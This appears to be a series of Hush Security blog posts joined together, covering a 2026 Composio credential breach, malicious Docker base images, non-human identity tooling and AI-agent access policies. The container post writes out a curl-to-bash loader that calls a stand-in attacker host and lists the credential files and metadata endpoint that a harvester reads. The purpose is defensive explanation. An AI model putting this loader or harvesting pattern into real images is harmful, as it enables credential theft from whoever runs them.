Author: Adi Chemoul

If your platform holds OAuth tokens or API keys on their behalf, you already are.

This post is for you if your platform stores OAuth tokens or API keys on behalf of customers, provides integrations that act on users’ behalf (Zapier, Make, Nango, Composio, or similar), runs AI agents or automated workflows using customer credentials, or connects to tools like Slack, GitHub, Snowflake, HubSpot, or Workday. If none of those apply – this isn’t your problem yet. If one does – keep reading.

Think about the security team’s job description from five years ago.

You were responsible for your company’s credentials. Your service accounts.

Your API keys. Your team’s access to production systems. The perimeter was clear: protect what belongs to us.

Then something shifted – quietly, gradually, without a formal handoff.

AI agents started acting on behalf of users. Integration platforms started storing tokens to connect customer tools. Automation workflows started holding API keys to call third-party APIs on your customers’ behalf. Every new product feature that required access to a customer’s Slack, their GitHub, their Snowflake, their Workday – created a credential your platform now owned, stored, and was responsible for.

Nobody rewrote the security team’s mandate. Nobody drew a line in the org chart between “our credentials” and “credentials we hold for others.” It happened as a product decision, not a security one. The credential store grew one integration at a time, one customer at a time, and now it contains something nobody explicitly signed up to protect: the production access keys of every company that trusted you enough to connect their tools.

This is the new reality for security engineers and CISOs, mainly with  integration platforms, AI analytics companies, automation tools, and any SaaS product that acts on behalf of its customers. Your threat model doesn’t start and end with your own environment anymore. Your credential store is the threat model.

Most security teams at platforms like these don’t have a complete picture of what they’re holding until something forces them to look: at a compliance audit. A penetration test. A breach.

By the time an attacker forces that moment, it’s too late.

That’s the challenge this post is about – and why Composio’s May 2026 incident report is required reading for anyone building in this space.

Think of it like an earthquake.

The most destructive quake in a sequence is rarely the first one. There are foreshocks – smaller tremors nobody takes seriously. Then the main event hits. And then the aftershocks keep coming, spreading outward, each one weakening structures that were already cracked.

The Composio breach is that earthquake. And the fault line runs through every company that trusted them with credentials.

Each company in that second column had done nothing wrong. Their security controls hadn’t failed. They didn’t appear in the attacker’s initial target list. They were downstream – connected to Composio the way buildings are connected to the ground.

When the ground moves, they move with it.

And look at the third column (the customers of the customers). The blast radius doesn’t stop at Composio’s customers. It reaches their customers too – the end users, the employees, the data. Every level of the chain absorbs a shock it never felt coming and had no way to prepare for.

That’s what makes this threat model different from a standard breach. The earthquake happened in one place. The damage is affecting everywhere else.

The companies in that list didn’t feel the tremor. They felt the aftershock.

The math nobody is running

Every integration platform, AI agent infrastructure layer, and analytics connector that requires access to customer data operates on the same model: collect credentials at setup, store them, use them to service requests on the customer’s behalf. The secret store is how the product works.

The problem is what happens when that store becomes a target.

Composio’s May 2026 incident report gave a rare and unusually transparent window into what that exposure looks like in numbers. They disclosed that 0.3% of their active connections were in the blast radius of their breach. That 0.3% contained:

Now ask the question nobody in the post-incident coverage asked:

What does 100% look like?

If Composio’s 0.3% maps to roughly 5,000 connections, their full credential store contained approximately 1.7 million live credentials across hundreds of tools – each one a valid key to a real customer’s production environment.

That’s not a vulnerability in the traditional sense. That’s architecture. And it’s not unique to Composio. It’s the default state of every platform that holds customer credentials at scale.

Read the connector list differently

Security people instinctively reach for the big number. 5,001 GitHub tokens – that’s the headline. Source code, CI/CD pipelines, GitHub Actions secrets, private repos. Real damage.

Lets take a closer look on the 1 digit row exposed secret, and what it could affect 

Workday. One token. Workday is an HR system. A single compromised Workday OAuth token gives read access to employee records, compensation data, org charts, PII for an entire company’s workforce. One token. One company’s HR database. Entirely accessible.

Gong. One token. Gong records and transcribes every sales call. A compromised Gong integration exposes every recorded customer conversation, every deal discussed, every competitive intelligence shared on a call. For a sales-led company, that’s the whole game.

Metabase. One token. Metabase is a business intelligence tool that runs directly against production databases. A Metabase single  token isn’t access to a dashboard – it’s often access to the underlying data. Depending on configuration, it’s a query interface to your customer’s entire data warehouse.

Sentry. One token. Sentry captures exceptions and stack traces from production applications. That means function names, file paths, line numbers, and sometimes variable values at the moment of failure. It’s a map of application internals that an attacker with time can use to find the next vulnerability.

Vercel + Render. Deployment infrastructure. One token each. These aren’t data stores – they’re the keys to production deployments. Depending on permissions, a compromised Vercel token can trigger new deployments, pull environment variables, or access build logs that contain secrets.

Gmail × 12. Twelve email accounts. Email is the root of trust for almost everything else – password resets, 2FA codes, vendor communications. Twelve Gmail tokens in a compromised credential store aren’t twelve email inboxes. They’re twelve master keys.

That’s what 0.3% contains. Not a database of user records. Not a payment system. A set of live credentials with access to HR systems, communication infrastructure, BI tools, deployment pipelines, error monitoring, and source code.

The breach doesn’t stay inside your perimeter

Here’s what makes the integration platform threat model fundamentally different from a standard enterprise breach.

In a typical breach, the attacker gains access to your data. That’s serious. You do incident response, you notify affected parties, you remediate.

When an integration platform is breached, the attacker gains access to credentials for your customers’ environments. They never touch your customers’ networks. They never trigger an alert in your customers’ security tooling. The requests come from tokens that customers authorized. From IPs their tools have seen before.

The affected company finds out when someone tells them – or when the data is already being sold.

In the Anodot incident, a threat actor breached an AI analytics platform and used authentication tokens stored there to access Snowflake environments across a dozen customer organizations. The affected companies had done nothing wrong. Their security controls hadn’t failed. They were downstream victims of a breach they never experienced.

This is the domino effect . The first tile is your platform. The rest of them belong to your customers.

The governance questions that should keep a security architect awake

The instinct after reading an incident report is to think about controls at the point of breach: Tighter access to production systems, improved detection. Those matter.

But the deeper question is about the credential store itself – not how the attacker got in, but what they found when they arrived.

Most integration platforms can’t answer these questions with confidence:

How many credentials are you holding right now, and for whom? Not an approximation from your database. A live, queryable inventory with credential type, connected tool, scope, issuing user, creation date, and last-used timestamp.

Which of those credentials belong to users who no longer work at the company that authorized them? OAuth tokens don’t expire when employees leave. The token a developer granted to your platform in 2024, for a GitHub repo they managed, is still valid today if it was never explicitly revoked. Your system is holding a credential that the issuing company almost certainly doesn’t know about.

What do the scopes on your stored credentials actually allow – and how much of that do you use? Platforms typically request the scopes that make the integration work, or accept whatever the customer’s tool offers. Those scopes are rarely audited after issuance. A GitHub token with admin:org scope, stored because the integration needed repo:read, is sitting in your database right now.

What’s your revocation SLA? If you detect a breach at midnight, how long does it take to revoke all credentials associated with a specific customer? All credentials for a specific tool across all customers? All credentials in your system? If the answer involves any manual steps, the SLA is measured in hours, and the exfiltration window is measured in the same units.

Composio’s response to their May 2026 incident involved revoking OAuth tokens across ~100 tool integrations and asking customers to handle the rest. That’s an honest response. It’s not a fast one. And speed is the variable that determines blast radius.

What a governed credential store looks like architecturally

The solution isn’t fewer integrations or simpler architecture. It’s building the credential store with the security posture appropriate for what it actually is: a centralized store of third-party production access credentials that grows more valuable – and more dangerous – with every customer you add.

Credentials as first-class entities with lifecycle state. Every stored credential should have a lifecycle model: issued → active → dormant → expired/revoked. Transitions between states should trigger events. A credential moving from active to dormant after 90 days of inactivity should generate an alert. A credential that has never been used after 30 days should prompt a review.

Scope as a governed attribute, not a setup artifact. The scope granted at authorization time should be validated against what the integration actually requires, on an ongoing basis. Overprivileged credentials should be flagged and, where the tool supports it, downscoped via re-authorization.

Revocation as a first-class API operation. Revocation should be a single, fast, auditable operation – scoped to a customer, a tool, or the entire credential store. If it’s not, it’s a design debt that will cost you in your incident response window.

The uncomfortable truth about scale

There’s a tension that every integration platform security team lives with: the product gets better as connections deepen, and security gets harder as the credential store grows.

A platform with 10,000 connections has a manageable problem. A platform with 1.7 million has a different order of magnitude – one that requires automated governance, not periodic audits.

And the threat model shifts with scale. At 10,000 connections, you’re an interesting target. At 1.7 million connections across hundreds of tools, you’re one of the highest-value credential repositories in the systems of every company that uses your product.

The security architecture needs to reflect that. Not because something has gone wrong – but because of what you’ve built.

You’re not just holding an API key for a customer’s Slack integration. You’re holding the credential that unlocks their HR system, their deployment pipeline, their source code, their recorded sales calls, their production database – depending on which of your connectors they’ve enabled.

That’s a responsibility that deserves a dedicated security discipline. Not bolted onto standard SaaS security practices. Built for the specific problem of governing delegated credentials at scale.

At Hush Security, we work with platforms on exactly this problem – the discovery, lifecycle management, and governance of non-human identities that exist on behalf of your customers.

Your organization has been using the same Python 3.11 base image for six months. It passed all static security scanning when you pulled it. Your supply chain policy flagged no violations. Automated vulnerability checks found nothing. Yesterday, when one of your containers started in production, the ENTRYPOINT script executed a single line: curl https://attacker-controlled-server.com/payload.sh | bash. By the time that command returned, the container had exfiltrated every SSH key on the host, dumped AWS credentials from the instance metadata endpoint, and attempted to compromise the Kubernetes cluster. The malware was never in the image. Your scanner never saw it. It arrived in code that only executed at runtime.

This attack pattern is no longer theoretical. It is happening at scale across Docker Hub and private registries worldwide. And the uncomfortable truth is that your existing container security tooling is not designed to catch it.

How The Container Credential Leakage Attack Works

The malicious container image attack exploits a fundamental asymmetry in how container security works: static analysis scans images at rest. Malicious payloads execute at runtime. There is a gap between these two moments, and attackers have learned to hide in it.

Here is the attack chain in detail.

Stage 1: The Malicious Image

An attacker creates a Docker image that looks legitimate. It might be a typosquatted version of a popular base image (ubunto:20.04 instead of ubuntu:20.04), or it might be a straightforward image with a misleading name like python-slim or golang-runtime designed to suggest it is an official image even though it is not. The image includes all the normal components you would expect: OS packages, runtimes, development tools.

But the ENTRYPOINT or CMD instruction contains a tiny bootstrap script. Not the malicious payload itself. Just a loader.

ENTRYPOINT ["/bin/sh", "-c", "curl https://attacker.com/init.sh | bash && exec \"$@\""]

This script is small enough to pass visual inspection. It looks like a normal entrypoint wrapper. When the image is built and layers are committed, the script sits in the top layer alongside legitimate files. When the image is pushed to a registry and scanned, the script is visible but appears benign. It is just a curl command. Nothing unusual about that.

The actual malware — the code that harvests credentials and exfiltrates data — is not in the image. It lives on the attacker’s server. It only lands on the target machine when the container starts and that curl command executes.

Stage 2: Registry Distribution

The image gets pushed to Docker Hub, or it gets mirrored into your organization’s private container registry. In the public case, it starts accumulating pulls. A typosquatted image can get millions of downloads because developers typing fast or working in low-attention contexts will grab the wrong name. In the private case, a developer pulls what they think is a legitimate base image and uses it for their Dockerfile.

Your image scanning tools analyze the image layers. They check every dependency, every package, every binary against vulnerability databases. The scanner looks for known CVEs, license violations, and malicious components. The ENTRYPOINT curl command might be flagged as a shell injection risk. But it is a common pattern in production Docker images. It is not enough to block the image. The image passes policy. It is added to the repository.

Stage 3: Container Deployment

Your team, or hundreds of teams across your organization, use the image as a base:

FROM ubunto:20.04

RUN apt-get update && apt-get install -y ca-certificates curl

COPY app /app

WORKDIR /app

CMD ["python", "app.py"]

Static scanning on your build pipeline sees a clean base image. Dependency checks pass. The image is promoted to production. Thousands of containers spawn from it across your cluster.

Stage 4: Runtime Execution and Credential Harvesting

The container starts. The ENTRYPOINT executes. The curl command fires. It downloads a shell script from the attacker’s server, pipes it to bash, and executes it in the container’s process space with the container’s identity and filesystem access.

What happens next depends on the attacker’s payload. In the documented cases, the pattern is consistent:

Credential Harvesting: The script spawns a background process that crawls the filesystem for everything a cloud attacker wants. SSH private keys in ~/.ssh/. AWS credentials in ~/.aws/credentials and instance metadata endpoints at http://169.254.169.254. GCP ADC tokens at ~/.config/gcloud/. Azure CLI configs at ~/.azure/. Kubernetes service account tokens at /var/run/secrets/kubernetes.io/serviceaccount/token. Environment variables that might contain API keys. Git configurations with embedded credentials. Bash history showing commands that exposed secrets.

Data Exfiltration: The harvested material is encrypted with a session key, that key is wrapped in the attacker’s RSA public key, and the whole bundle is POSTed to a server controlled by the attacker. Only they have the private key. Even if the traffic is intercepted, the data is unreadable.

Lateral Movement: If the container is running in Kubernetes with a service account that has cluster-admin or overly permissive permissions, the malware uses the token to enumerate secrets across all namespaces, dump them, and attempt to schedule privileged pods on other nodes.

The container appears to function normally. Your monitoring shows CPU and memory usage as expected. The application logs show no errors. The attack is silent.

Secrets Leakage Container Attack

Here is what the attack looks like when traditional container security fails to catch it:

Figure 1: The Attack Uncaught. Credentials are harvested and exfiltrated to attacker infrastructure. Static image scanning, SCA tools, and network monitoring all miss the attack because the malicious payload executes at runtime, not in image layers.

Why Your Existing Container Security Tools Miss This

Your security stack includes several layers of defense, each one assumed to catch supply chain attacks. None of them are designed for this specific threat.

Container Image Scanning looks at the image layers before they run. It performs deep, recursive analysis of every component. It checks against CVE databases, malicious package feeds, and license compliance policies. But it is analyzing a static artifact — a tarball of files on disk. The malicious binary is not in that tarball. It is on the attacker’s server. The script that will fetch it is visible, but the script itself is not malicious code. It is a downloader. Static scanners cannot analyze what the curl command will return. They cannot execute the script in a sandbox and observe its behavior. They can flag the risky pattern (shell pipe to bash) but that pattern is too common in production images to block outright. The image passes.

Vulnerability scanning in your CI/CD pipeline works the same way. It runs on images before they are deployed. It checks dependencies. It finds nothing wrong.

Network egress controls might catch the exfiltration attempt, if you have strict allowlisting in place. Most organizations do not. Developer laptops almost never do. And even in production, the domain the malware connects to is often designed to blend in. update-service.cloudcdn.com or metrics-relay.internal.io. It looks legitimate in logs. Or it can even send data to benign known locations, like GitHub, effectively exfiltrating via git commits.

Kubernetes network policies do not run on the container before it starts. By the time the policy engine is evaluating traffic, the curl command has already executed and the exfiltration has begun.

Runtime container controls (seccomp profiles, AppArmor, read-only root filesystems) can slow down the attack, but they rarely stop it. A well-crafted payload works around them. And more importantly, most organizations have not deployed these controls at scale because they require deep knowledge of what each container actually needs to do.

The root cause is that all of these tools assume the code running inside the container at startup is trustworthy. They assume that if the image passed scanning, the image is safe. Supply chain attacks invalidate that assumption. An image that was legitimately scanned can become malicious at the moment it executes, if that execution includes downloading and running arbitrary code from the internet.

The Structural Problem: Static Secret Scanning vs Runtime Execution

The attack works because of a mismatch in the container security model. Images are scanned as static artifacts. Execution is a runtime process. Code does not need to exist in the image to run inside the container.

This is actually a feature. Many container images intentionally download and compile code at startup. They do this for good reasons: smaller image sizes, dynamic version selection, runtime configuration. But the same mechanism enables malicious payloads.

The response from defenders is usually to add more static controls. Scan earlier. Scan more aggressively. Use allowlists of approved registries. Check image signatures. None of these stop an attacker who has registered a typosquatted image on Docker Hub and signed it legitimately, or who has compromised a supply chain and injected the bootstrap script into an official image before it is signed.

The uncomfortable truth is that as long as your container security model is built on scanning static artifacts, you are vulnerable to attacks that fetch and execute code at runtime. Rotation and incident response are your primary tools. You will detect the attack by finding exfiltrated data in your cloud logs. Then you will rotate credentials, patch images, and rebuild containers.

Runtime Detection: The Different Security Model

At Hush, we build on a different premise: the runtime behavior is the security boundary. Credentials should not be files that any process can read. Access should not be gated by possession of secrets. And execution should be monitored and controlled by policy, not just by static image analysis.

Here is what that means in practice for this attack:

No Static Credentials to Harvest: When containers access AWS, GCP, Azure, databases, or APIs through Hush, they do not receive long-lived credentials to store on disk or in environment variables. They request short-lived, dynamically issued tokens scoped to exactly the permissions the current workload requires. There is no ~/.aws/credentials for the malware to find. No Kubernetes ClusterAdmin token sitting in a service account. No hardcoded database password in a ConfigMap. A credential harvester returns empty-handed because the credentials do not exist in the form it is looking for. If static credentials are mandatory, Hush makes sure to automatically rotate and revoke keys, voiding the exfiltration attempt shortly after.

eBPF-Based Non Human Identity Anomaly Detection: Hush’s sensor observes system calls at runtime without kernel modification or agent overhead. It tracks which processes open which files, which network connections they initiate, and which identities (credentials, API tokens, connection strings) are behind each action. In this attack, the sensor would observe the exact moment when the malicious behavior begins and alert before exfiltration completes.

Scoped, Time-Limited Access to Kubernetes: If the container is running in Kubernetes, the service account token it receives through Hush is scoped to the minimum permissions the workload actually needs and expires after a short TTL. A token that allows a pod to read its own namespace’s ConfigMaps cannot be used to enumerate cluster secrets or schedule pods. The API calls the malware makes return 403 (Forbidden). The attempt is logged.

Coordinated Remediation: When Hush detects malicious runtime behavior in a container, we immediately trace that container back to the source image. We identify all downstream consumers of that image across your deployments. The initial attack detection is not the end of the incident response. It is the start of a coordinated remediation that reaches every affected container in your organization.

Detect and Protect Secret Leakage at Container Runtime

Here is the same attack when Hush runtime monitoring is in place:

Figure 2: Attack Detected by Hush. Attack is detected and blocked before credentials are exfiltrated. Multi-stage runtime anomaly detection (1. unexpected process spawn, 2. credential file access, 3. unauthorized network egress) fires on attack initiation. Malicious image is identified and quarantined automatically.

Real-World Attack: Malicious Container Images on Docker Hub

The attack we have outlined is not theoretical. This pattern has been documented across hundreds of malicious images in public registries in recent campaigns.

Security researchers have discovered malicious container images on Docker Hub that use typosquatting to mimic legitimate base images. These images executed Python scripts at startup that downloaded cryptocurrency miners. The scripts appeared benign on the surface. The miners were compressed and embedded in ways that signature-based scanners missed. Popular images with misleading titles like azurenql accumulated over a million downloads before detection.

The most effective attacks follow a consistent pattern: they include only a tiny bootstrap script in the image layers. The heavy payload — the actual miner or credential stealer — is fetched and executed at runtime. Until the image runs, the compiled binary does not exist anywhere a static scanner can find it.

Campaigns using images with names like openjdk and golang were particularly sophisticated. The images had misleading titles designed to trick developers into thinking they were official releases. When run, they downloaded and compiled miners, then used the container’s resources for cryptocurrency mining. The attacks remained undetected for months because the mining process was small and quiet, and the bootstrap script looked like normal container initialization.

Defense Strategy: Beyond Static Image Scanning

If you pull base images from Docker Hub or other public registries, treat your supply chain as under active threat. The specific defenses:

Verify image provenance using digests: Do not pull images by name alone. Use image digests (the SHA256 hash of the image manifest). Verify the digest against the official source (the publisher’s GitHub, their documentation, or a signed checksum). If the image name has changed hands or the publisher account has been compromised, the digest will not match what you expect.

# Vulnerable: pulling by tag
docker pull ubuntu:20.04

# More secure: pulling by digest
docker pull ubuntu@sha256:12345abcde...

Implement image signing and verification: Use Cosign or similar tools to cryptographically verify that images have been signed by the publisher you expect. This does not prevent typosquatting (an attacker can sign their own images), but it does ensure you are getting what the publisher actually released.

Use private registries with gating policies: If you use a container registry, implement a policy that requires all images to pass security scanning before they are available to deployments. But understand that this catches known vulnerabilities, not novel runtime attacks.

Deploy runtime behavioral monitoring: This is where Hush comes in. Runtime behavioral monitoring can detect when a container does something it should not do, whether that is spawning an unexpected process, opening credential files, or making network connections to unauthorized domains. This catches attacks that static scanning cannot.

Audit and rotate credentials regularly: If credentials are present in your environment as static files or environment variables, assume they have been compromised if a malicious image has run in your infrastructure. Rotate all of them: SSH keys, cloud provider credentials, database passwords, API keys, and Kubernetes service account tokens. Use a solution that provides identity-based access, rather than file or env-based, and one that orchestrates automatic, timely rotation to minimize breach impact — don’t wait for a breach to happen or for “that time in the year”.

Beyond Static Checks: The Future Of Container And Secrets Security, From Code To Cloud

The attack on container base images puts a question to every engineering team: What would your organization’s security posture look like if a malicious image ran in your infrastructure for a week without crashing or raising alarms?

If the answer is that you would not know it happened until you discovered exfiltrated data in your cloud logs, or noticed cryptocurrency mining draining your cloud resources, or found lateral movement in your Kubernetes audit logs, that is a signal that your security model is too dependent on static checks and incident response.

We built Hush to make that question less frightening. By moving the security boundary from image artifacts to runtime behavior, by issuing credentials dynamically rather than storing them, and by monitoring for anomalies rather than waiting for post-incident forensics, we change the equation. The malicious payload can fetch whatever it wants. It still cannot exfiltrate credentials that do not exist. It still cannot move laterally with tokens that do not grant the permissions it needs. And it will be caught before it completes.

If you want to see what shift-left access, eliminating static credentials and implementing runtime detection looks like for your container infrastructure, we are happy to walk you through it.

Hush Security delivers a unified access and governance platform for AI and non-human identities, replacing secrets with verified identities and dynamic, just-in-time access policies.

The next malicious base image will pass your scanner. Hush makes sure it still can’t do anything with what it finds.

Let’s Fix That. Get a Demo

The Non-Human Identity Crisis

Over the past decade, cloud adoption and API-first architectures have exploded. Every microservice, CI/CD pipeline, third-party integration, and automation script requires credentials to function. Today’s organizations manage tens of thousands of API keys, service account tokens, certificates, and secrets, collectively known as Non-Human Identities (NHIs).

Unlike human identities, NHIs proliferate unchecked, rarely expire, and often hold excessive privileges. When the GitGuard leak exposed over 10 million secrets on GitHub, and when CircleCI’s breach compromised thousands of customer secrets, the industry woke up to a critical gap: we had no systematic way to manage, monitor, or secure non-human identities at scale.

This realization spawned a new category of NHI security tools. But three years in, organizations are still experiencing breaches. The problem? These tools aren’t solving the actual problem.

Why Current NHI Tools Are Failing

1. Limited Visibility: Log-Based Detection Misses the Full Picture

Most NHI tools rely on scanning logs, code repositories, and configuration files to detect exposed secrets. This approach has fundamental limitations:

• Integration-dependent blind spots – They only see what they’re integrated with. Secrets in proprietary systems, legacy applications, or new SaaS tools remain invisible.
• Point-in-time snapshots – Log scanning provides historical data, not real-time awareness of active secrets in production.
• Incomplete coverage requires tool sprawl – Organizations deploy multiple complementary tools (repo scanners, log analyzers, CSPM tools) just to achieve partial visibility, creating fragmented insights and operational complexity.

The result: You’re blind to a significant portion of your NHI attack surface.

2. Static Risk Posture: Not Risk-Based on Reality

Current tools assess risk based on static configurations, whether a secret is overprivileged, improperly scoped, or detected in a repository. But they lack runtime context:

• No visibility into actual usage – Is this API key actively being used? When was it last called? From where?
• No understanding of exploitability – Which secrets, if compromised, could actually cause damage versus dormant credentials with no real-world impact?
• No prioritization based on business context – Not all exposed secrets carry equal risk, but tools treat them uniformly, flooding teams with thousands of “critical” findings.

The result: Security teams drown in alerts they can’t prioritize, while truly critical risks hide in the noise.

3. No Effective Remediation: Jira Tickets Aren’t Security

Perhaps the most glaring failure: every existing tool considers opening a Jira ticket as “remediation.”

Here’s what actually happens:

• Tool detects an exposed secret
• Creates a ticket assigned to a developer
• Developer is already buried in work
• Ticket sits in backlog for weeks or months
• Secret remains exposed and exploitable

This isn’t remediation, it’s offloading responsibility and hoping someone eventually gets to it. Meanwhile:

• Developers lack context to prioritize the ticket
• Manual secret rotation is complex and error-prone
• Teams fear breaking production, so they delay
• The “remediated” number in dashboards is a fiction

The result: Organizations have impressive detection metrics but unchanged security outcomes.

4. The Treadmill Problem: Creation Outpaces Remediation

Even when teams heroically remediate dozens of exposed secrets, hundreds more are being created simultaneously:

• Developers spin up new services with hardcoded credentials
• CI/CD pipelines generate new API keys
• Third-party integrations add more service accounts
• Shadow IT proliferates unmanaged secrets

You’re running on a treadmill that’s speeding up. No matter how fast you remediate, the backlog grows. This approach cannot win long-term, it’s mathematically unsustainable.

The result: The NHI problem compounds over time despite significant investment in security tools.

So What Are Teams Ending Up Doing

Recognizing these gaps, organizations attempt to solve NHI security by combining multiple tools:

• NHI scanners – These tools provide limited visibility, primarily detecting only what they are directly connected to. They rely on log ingestion and can become costly for customers at scale.
• Vault or Secrets Manager – Almost every organization has one (or multiple), but these are storage solutions, not security tools. They’re safes where you store secrets; they don’t tell you which secrets are exposed, overprivileged, or actively exploited.
• CSPM tools – Offer limited visibility mostly for major cloud providers (AWS, GCP, Azure) and a limited set of supported applications, with no remediation capabilities, just more alerts to manually triage.

But this Frankenstein approach creates new problems:

• Fragmented visibility – Each tool shows a different piece of the puzzle; no unified view of your actual NHI risk
• Alert fatigue – Multiple tools generating overlapping alerts with no centralized prioritization
• No coordinated remediation – Each tool operates in isolation; rotating a secret in Vault doesn’t update the scanner’s findings
• Operational overhead – Security teams spend more time managing tools than managing risk

Companies experiencing major NHI-related breaches were already using these tools. Despite deploying scanners, vaults, and CSPM platforms, their non-human identities remained exploitable. Detection without prevention leaves the door wide open.

A New Approach Is Required

The fundamental problem is that existing tools treat NHI security as a detection problem when it’s actually a governance and access control problem.

We don’t solve human identity security with scanning tools. We solve it with centralized identity governance platforms that enforce least-privilege access, monitor usage in real-time, and automate lifecycle management.

The same principles apply to non-human identities:

What’s Needed: A Unified NHI Governance Platform

1. Centralized Control Across All NHI Types

• API keys, service accounts, OAuth tokens, certificates, database credentials—managed in one platform
• Works across cloud providers (AWS, GCP, Azure), SaaS applications, on-prem systems, and custom infrastructure

2. Real-Time Runtime Visibility

• See which secrets are actively used, when, and by what
• Understand actual exploitability and business impact
• Risk scoring based on live data, not static configurations

3. Policy-Based Governance

• Apply cloud IAM security principles (least privilege, ephemeral access, policy enforcement) to ALL non-human identities
• Centralized policy engine that works uniformly across your entire tech stack

4. Built-In Remediation

• Don’t create tickets, fix the problem automatically
• Don’t rotate compromised secrets, revoke excessive permissions, enforce identity-based access policies instead
• Zero additional work for development teams

The Bottom Line

Existing NHI tools are failing because they’re solving the symptom and not curing the disease. They’re detection engines in a world that needs governance platforms.

Organizations need a centralized NHI governance and control platform, one that applies proven identity security principles across all non-human access, finds and remediates risks automatically, and scales with the explosive growth of machine identities.

It’s time to stop detecting the problem and start preventing it.

AI agents are rapidly moving from experimental tools to first-class actors inside production environments. They call LLM APIs, orchestrate workflows through MCP servers query databases like Postgres and Snowflake, and trigger actions in third‑party SaaS platforms such as Stripe.

But from a security perspective, there’s an uncomfortable truth most organizations haven’t fully confronted yet:

AI agents are operating with the same static credentials model we already know is broken-only now at machine speed and machine scale.

For CISOs, this isn’t just another secrets management problem. It’s a new, amplified data‑exfiltration risk surface.

The Hidden Risk: AI Agents Inherit the Worst of Static Credentials

Today, most AI agents authenticate exactly like legacy services:

• Long‑lived API keys for LLM providers
• Static database credentials for Postgres or Snowflake
• Hard‑coded SaaS tokens for Stripe or internal APIs
• Broad permissions granted “just in case” the agent needs them

From a risk standpoint, this creates a perfect storm:

• No identity context – Credentials don’t know who is using them or why
• No execution awareness – Access looks the same whether it’s a valid task or a malicious prompt
• No blast‑radius control – A single leaked key can unlock massive datasets
• No runtime enforcement – Once issued, the key works everywhere, all the time

When an AI agent is compromised-through prompt injection, model manipulation, supply‑chain risk, or simple misconfiguration-the organization has no meaningful way to contain the damage.

This is how silent data exfiltration happens.

Why Traditional Controls Fail Against Agentic Access

Security teams often try to compensate by layering controls around static credentials:

• Network restrictions
• Token rotation policies
• Monitoring and anomaly detection

These help-but they don’t solve the core issue.

Static credentials are non‑contextual by design. They can’t express:

• Which agent is calling the service
• What task the agent is executing
• What data should be accessible right now
• Whether the request violates business or security intent

For human identities, we solved this years ago with identity‑aware access, conditional policies, and least privilege.

For AI agents, most organizations are still stuck in 2010.

The Shift: From Secrets to Policy‑Based Agent Identity

Preventing data exfiltration by AI agents requires a fundamental shift:

Stop authenticating agents with static secrets. Start authorizing them with policy‑based identity.

In a policy‑based model:

• AI agents authenticate using a strong, verifiable runtime identity
• Access is granted dynamically, not pre‑embedded in code
• Every request is evaluated against real‑time policy
• Permissions are scoped to task, resource, and time

Instead of asking:

“Does this API key look valid?”

The system asks:

“Should this agent, performing this action, access this resource right now?”

That question is the difference between control and blind trust.

Applying Policy‑Based Access to LLMs, MCP, and SaaS

Policy‑based identity isn’t theoretical-it applies directly to the systems AI agents already touch.

LLM Services

• Limit which models an agent can access
• Restrict prompt and response scopes
• Enforce usage boundaries per task or environment
• Prevent cross‑tenant or cross‑context leakage

MCP and Internal Services

• Bind agent identity to specific workflows
• Prevent lateral movement between services
• Enforce service‑to‑service least privilege dynamically

Databases and Data Platforms

• Grant just‑in‑time access to Postgres or Snowflake
• Restrict queries to approved schemas or datasets
• Automatically revoke access when the task completes

Third‑Party SaaS (e.g., Stripe)

• Scope actions to specific operations (read vs. write vs. execute)
• Prevent high‑impact actions outside approved flows
• Eliminate long‑lived tokens embedded in agent logic

The result: even if an agent is manipulated, its ability to exfiltrate data is structurally constrained.

Why This Matters to CISOs Now

AI agents change the economics of risk.

They:

• Operate continuously
• Act autonomously
• Chain multiple systems together
• Access high‑value data at scale

A single compromised agent can do more damage, faster, than dozens of traditional workloads and services.

From a CISO perspective, this raises hard questions:

• Can we prove which agent accessed sensitive data?
• Can we enforce least privilege at runtime-not design time?
• Can we contain an incident without taking systems offline?
• Can we show auditors that agent access is governed and intentional?

Static credentials cannot answer these questions.

Policy‑based identity can.

The Solution: How Hush Enables Secure Agentic Access

Preventing data exfiltration by AI agents requires more than better secrets hygiene. It requires eliminating secrets as the primary control plane altogether.

Hush enables organizations to shift AI agents from secret-based access to policy-based identity, fundamentally changing how agentic access is granted, evaluated, and enforced at runtime.

Instead of embedding long-lived API keys, tokens, or database credentials into agent logic, Hush:

• Establishes a strong runtime identity for each AI agent
• Replaces static secrets with just-in-time, policy-evaluated access
• Authorizes every request based on who the agent is, what it is doing, and what it should access

This shift is critical for stopping data exfiltration.

With policy-based access enforced by Hush:

• AI agents never hold standing credentials that can be leaked, reused, or abused
• Access is narrowly scoped to approved actions, data sets, and services
• Permissions automatically expire when the task or context ends
• Compromised or manipulated agents are structurally limited in what data they can reach

By removing static secrets from the equation and enforcing identity-driven, runtime policy, Hush turns AI agents from an uncontrolled data exfiltration risk into governed, auditable non-human identities.

This is not an incremental improvement.

It is the difference between hoping an AI agent behaves – and ensuring it cannot cause harm even if it doesn’t.